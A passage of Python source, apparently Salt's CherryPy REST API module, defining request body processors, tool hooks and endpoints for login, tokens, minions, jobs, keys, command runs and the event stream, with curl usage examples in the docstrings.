salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, 'TimeoutError') and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
            'return': '{0}'.format(traceback.format_exc())
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
if six.PY3:
response = salt.utils.stringutils.to_bytes(response)
return response
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
if six.PY3:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
entity.fp.read(fp_out=contents)
contents.seek(0)
body_str = contents.read()
body_bytes = salt.utils.stringutils.to_bytes(body_str)
body_bytes = six.BytesIO(body_bytes)
body_bytes.seek(0)
# Patch fp
entity.fp = body_bytes
del contents
# First call out to CherryPy's default processor
    cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = contents.read()
del contents
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = contents.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = contents.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
'on_start_resource': [
('html_override', html_override_tool),
('salt_token', salt_token_tool),
],
'before_request_body': [
('cors_tool', cors_tool),
('salt_auth', salt_auth_tool),
('hypermedia_in', hypermedia_in),
],
'before_handler': [
('lowdata_fmt', lowdata_fmt),
('hypermedia_out', hypermedia_out),
('salt_ip_verify', salt_ip_verify_tool),
],
}
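# Register each tool with CherryPy at its hook point; the increasing priority
# values keep the tools running in the order they are listed above.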
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(cherrypy.tools, tool_name, cherrypy.Tool(
hook, tool_fn, priority=(50 + idx)))
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.salt_token.on': True,
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if cherrypy.session.get('user'):
chunk['__current_eauth_user'] = cherrypy.session.get('user')
if cherrypy.session.get('groups'):
chunk['__current_eauth_groups'] = cherrypy.session.get('groups')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
@cherrypy.config(**{'tools.sessions.on': False})
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
            [{"tgt": "*", "fun": "status.diskusage"}]
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = {'client': 'runner'}
if jid:
lowstate.update({'fun': 'jobs.list_job', 'jid': jid})
else:
lowstate.update({'fun': 'jobs.list_jobs'})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns:
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = six.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, six.StringIO(pub_key))
tarball.addfile(priv_key_file, six.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
        headers['Content-Length'] = len(fileobj.getvalue())
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
cherrypy.session['user'] = token['name']
if 'groups' in token:
cherrypy.session['groups'] = token['groups']
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if token['eauth'] == 'django' and '^model' in eauth:
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Token(LowDataAdapter):
'''
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
'''
@cherrypy.config(**{'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
'''
for creds in cherrypy.request.lowstate:
try:
creds.update({
'client': 'runner',
'fun': 'auth.mk_token',
'kwarg': {
'username': creds['username'],
'password': creds['password'],
'eauth': creds['eauth'],
},
})
except KeyError:
raise cherrypy.HTTPError(400,
'Require "username", "password", and "eauth" params')
return list(self.exec_lowstate())
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of :term:`lowstate` data describing Salt commands must be
sent in the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
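# Illustrative client-side sketch (not part of this module): calling /run with
# a pre-generated Salt eauth token instead of a session. Assumes the
# third-party ``requests`` package; the token value is a placeholder.
#
#     import requests
#
#     lowstate = [{'client': 'local', 'tgt': '*', 'fun': 'test.ping',
#                  'token': '<salt eauth token here>'}]
#     resp = requests.post('http://localhost:8000/run', json=lowstate)
#     print(resp.json())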
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is completely asynchronous and Salt itself is very
fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
